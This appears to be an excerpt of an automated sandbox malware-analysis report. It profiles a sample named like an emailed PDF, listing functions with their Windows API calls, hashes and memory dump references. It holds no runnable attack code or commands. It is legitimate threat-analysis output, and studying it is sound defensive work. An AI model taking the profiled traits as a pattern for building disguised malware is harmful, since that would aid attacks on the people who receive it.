                                                                                                          • Opcode ID: 866753718bec327c6b8c38dcb63f56fe9abc5e16bb021539d56bc7d4d079c5ff
                                                                                                          • Instruction ID: b91b5ca49c09c68ede90a608c1df3ad3e1e7b62decb91c35b2c660ec24f9e246
                                                                                                          • Opcode Fuzzy Hash: 866753718bec327c6b8c38dcb63f56fe9abc5e16bb021539d56bc7d4d079c5ff
                                                                                                          • Instruction Fuzzy Hash: 6221B0B1504308BFEB11AB60CC89FBB77FDEB49764F50813EF90592141DB289D0597A0
                                                                                                          Function 007D63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
                                                                                                            • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
                                                                                                            • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
                                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007D6461
                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 007D6468
                                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007D647D
                                                                                                          • DestroyWindow.USER32(?), ref: 007D6485
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                          • String ID: SysAnimate32
                                                                                                          • API String ID: 4146253029-1011021900
                                                                                                          • Opcode ID: 1bdb991a89e1162e471ffe1b14f1059c1f1128b51bf193f15c99d30b70510e66
                                                                                                          • Instruction ID: 1bf618bf357afa60776152f585147e50b668c58da5797b811cf87cf0d2e02631
                                                                                                          • Opcode Fuzzy Hash: 1bdb991a89e1162e471ffe1b14f1059c1f1128b51bf193f15c99d30b70510e66
                                                                                                          • Instruction Fuzzy Hash: 56218871200245EFEF108FA4DC84EBB37BDEF58768F20862AFA5092290D779DC41A760
                                                                                                          Function 007B6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 007B6DBC
                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007B6DEF
                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 007B6E01
                                                                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007B6E3B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHandle$FilePipe
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 4209266947-2873401336
                                                                                                          • Opcode ID: 006fe4e2317b55d5ec2262349a8b85c8afa0af1f638c36b37b8314534aa97fa3
                                                                                                          • Instruction ID: 5c902ce7359f947b084e15efd4bf70cf677179e363c4c9883e862e1634e1398a
                                                                                                          • Opcode Fuzzy Hash: 006fe4e2317b55d5ec2262349a8b85c8afa0af1f638c36b37b8314534aa97fa3
                                                                                                          • Instruction Fuzzy Hash: 44215175700209ABDF209F29DC05BDA7BB4FF45720F204A29FEA1D72D0D778A9508B54
                                                                                                          Function 007B6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 007B6E89
                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007B6EBB
                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 007B6ECC
                                                                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007B6F06
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHandle$FilePipe
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 4209266947-2873401336
                                                                                                          • Opcode ID: 10b67a598e515c3377e868f4c6574585d705556f10ee03dd62208201d9cec474
                                                                                                          • Instruction ID: be001a9120438d95aa0945378bdfab7bdc1673d59c9d75ffb6b4dc600e4679f2
                                                                                                          • Opcode Fuzzy Hash: 10b67a598e515c3377e868f4c6574585d705556f10ee03dd62208201d9cec474
                                                                                                          • Instruction Fuzzy Hash: 1D2190795003059BDB209F69DC04BEA77A8FF45720F204A1AFAA1D72D0E77CE8508B60
                                                                                                          Function 007BAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 007BAC54
                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007BACA8
                                                                                                          • __swprintf.LIBCMT ref: 007BACC1
                                                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,007DF910), ref: 007BACFF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                          • String ID: %lu
                                                                                                          • API String ID: 3164766367-685833217
                                                                                                          • Opcode ID: 68c789b7335006c5020379ecc450e667f88f141a1bd3c8c8a1b55077954547af
                                                                                                          • Instruction ID: 17245c2d7312fd9cac9c5f40af4d5dee037cf55dd2a9c3c2f5e214add4652a58
                                                                                                          • Opcode Fuzzy Hash: 68c789b7335006c5020379ecc450e667f88f141a1bd3c8c8a1b55077954547af
                                                                                                          • Instruction Fuzzy Hash: 59216070A00109EFCB10EF64CD49EEE7BB8EF49715B0080A9F909DB251DA79EA45CB21
                                                                                                          Function 007B1142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007AFCED,?,007B0D40,?,00008000), ref: 007B115F
                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,007AFCED,?,007B0D40,?,00008000), ref: 007B1184
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007AFCED,?,007B0D40,?,00008000), ref: 007B118E
                                                                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,007AFCED,?,007B0D40,?,00008000), ref: 007B11C1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                          • String ID: @{
                                                                                                          • API String ID: 2875609808-4255285803
                                                                                                          • Opcode ID: 10a201ab437d6ae0744001075709cb7620bb8386c465a02f099db7e3b7887ac4
                                                                                                          • Instruction ID: abf86f2e349e0424822ecc73a566d84c3f6917cd23e3e09466e17eb225544ae3
                                                                                                          • Opcode Fuzzy Hash: 10a201ab437d6ae0744001075709cb7620bb8386c465a02f099db7e3b7887ac4
                                                                                                          • Instruction Fuzzy Hash: 7F113C31D0151DE7CF009FA9D858BEEBF78FF09751F808056EA85B6240CB789960CBA5
                                                                                                          Function 007B1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 007B1B19
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharUpper
                                                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                          • API String ID: 3964851224-769500911
                                                                                                          • Opcode ID: 87121a5bcfce87f72fa524280bd8c6e3e6bc88eaf9524eee6230f01810b16691
                                                                                                          • Instruction ID: 13d3181565b9e4ad7be55343e6b77eb70656f9ae9750aad59c0f2b9238afbe9c
                                                                                                          • Opcode Fuzzy Hash: 87121a5bcfce87f72fa524280bd8c6e3e6bc88eaf9524eee6230f01810b16691
                                                                                                          • Instruction Fuzzy Hash: 5B118B71900208CFCF00EFA4DC669EEB3B4FF25704F9084A9D854A7692EB365D0ACB40
                                                                                                          Function 007CEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007CEC07
                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007CEC37
                                                                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007CED6A
                                                                                                          • CloseHandle.KERNEL32(?), ref: 007CEDEB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2364364464-0
                                                                                                          • Opcode ID: 2f0cf722f5015e6383d5e5d27885dda30d7cbc78735c610481d201daa02c87f9
                                                                                                          • Instruction ID: cbd3ded1543577a394fd5914b32487373f61a0c8ea6b714edc79aa5e412f610b
                                                                                                          • Opcode Fuzzy Hash: 2f0cf722f5015e6383d5e5d27885dda30d7cbc78735c610481d201daa02c87f9
                                                                                                          • Instruction Fuzzy Hash: 01815071600700DFD760EF28C84AF6AB7E5AF48711F14881DF99A9B292D7B8AD44CB52
                                                                                                          Function 007D0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                            • Part of subcall function 007D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007CFDAD,?,?), ref: 007D0E31
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D00FD
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D013C
                                                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007D0183
                                                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 007D01AF
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 007D01BC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 3440857362-0
                                                                                                          • Opcode ID: e1569dfe54875d9cb73549f5702ae9c930af7c8764b4f5a63e195f600402e7a2
                                                                                                          • Instruction ID: 82c0a4729f3e9aef6ce436aa1c465e8717bacdbc4e0a9f953de39b8c5f2fbeed
                                                                                                          • Opcode Fuzzy Hash: e1569dfe54875d9cb73549f5702ae9c930af7c8764b4f5a63e195f600402e7a2
                                                                                                          • Instruction Fuzzy Hash: D7512871208204EFD704EB64C885FAAB7F9BF84314F44891EF955872A1DB79E908CB92
                                                                                                          Function 007CD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007CD927
                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 007CD9AA
                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 007CD9C6
                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 007CDA07
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007CDA21
                                                                                                            • Part of subcall function 00755A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7896,?,?,00000000), ref: 00755A2C
                                                                                                            • Part of subcall function 00755A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7896,?,?,00000000,?,?), ref: 00755A50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 327935632-0
                                                                                                          • Opcode ID: 8d59d6193cee7593ee15caec6e2c5dfb2bfbdce09aa470480068d484bc4f6ae4
                                                                                                          • Instruction ID: b1a4011bab7ce588fbbd227b5fba4d8a6788dacdb0b2df3ed2474fff750c78fe
                                                                                                          • Opcode Fuzzy Hash: 8d59d6193cee7593ee15caec6e2c5dfb2bfbdce09aa470480068d484bc4f6ae4
                                                                                                          • Instruction Fuzzy Hash: 7D511875A00209DFCB10EFA8C498EADB7B5EF09310B14C069E956AB322D779ED45CB91
                                                                                                          Function 007BE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007BE61F
                                                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007BE648
                                                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007BE687
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007BE6AC
                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007BE6B4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 1389676194-0
                                                                                                          • Opcode ID: 87c860118f56af56d344b5de19543f898bea054ee2dd21410a30f9582f8f3a0e
                                                                                                          • Instruction ID: 5cd3b709c64e15bc66fd40b0fc9036f424ee5b0ef1462b1997cd73d44dd2684b
                                                                                                          • Opcode Fuzzy Hash: 87c860118f56af56d344b5de19543f898bea054ee2dd21410a30f9582f8f3a0e
                                                                                                          • Instruction Fuzzy Hash: 82513A35A00609DFCB00EF64C985AADBBF5FF09314B1480A9E909AB361CB79ED14DF50
                                                                                                          Function 007DA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 132fd2fd3a9671354c17da84ede3768f667a36b7d6eb2f8f0c469c3dfd12fdf5
                                                                                                          • Instruction ID: 4599f3ef600294a60a0f9eb96e3af50ccd38b4bc5ea2b6ad5291c3a780a30e44
                                                                                                          • Opcode Fuzzy Hash: 132fd2fd3a9671354c17da84ede3768f667a36b7d6eb2f8f0c469c3dfd12fdf5
                                                                                                          • Instruction Fuzzy Hash: 4D419035905108FFDB20DB28CC88FA9BBB8FB09310F154267E916A73E1D779AD41DA61
                                                                                                          Function 007A63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A63E7
                                                                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 007A6433
                                                                                                          • TranslateMessage.USER32(?), ref: 007A645C
                                                                                                          • DispatchMessageW.USER32(?), ref: 007A6466
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A6475
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                          • String ID:
                                                                                                          • API String ID: 2108273632-0
                                                                                                          • Opcode ID: cc3973acdb2ca4a5b4e6550e29a2394e1c01aade711c9bb2c0ee6147939f816f
                                                                                                          • Instruction ID: 6bea41e5a2e7cba5863630fdf7532b4b54adef0fc904e105858658b23237f79d
                                                                                                          • Opcode Fuzzy Hash: cc3973acdb2ca4a5b4e6550e29a2394e1c01aade711c9bb2c0ee6147939f816f
                                                                                                          • Instruction Fuzzy Hash: DB31C471901686EFDB648FB0DC44BF67BACBF86300F188265E525C21A0E73D9589D760
                                                                                                          Function 007A8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 007A8A30
                                                                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 007A8ADA
                                                                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007A8AE2
                                                                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 007A8AF0
                                                                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007A8AF8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3382505437-0
                                                                                                          • Opcode ID: 578fc7e1048e0022a4909809315b610002f3026e4e340cf0d72d9b58489796de
                                                                                                          • Instruction ID: 5977b41e14e0303081878da696662bffb66175c0f09198aa019e2db8e0a62950
                                                                                                          • Opcode Fuzzy Hash: 578fc7e1048e0022a4909809315b610002f3026e4e340cf0d72d9b58489796de
                                                                                                          • Instruction Fuzzy Hash: 6D31EE71500219EBDF14CFA8DD4CA9E3BB5EB45315F10822AF925EA2D0C7B89D10CB91
                                                                                                          Function 007AB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsWindowVisible.USER32(?), ref: 007AB204
                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007AB221
                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007AB259
                                                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007AB27F
                                                                                                          • _wcsstr.LIBCMT ref: 007AB289
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
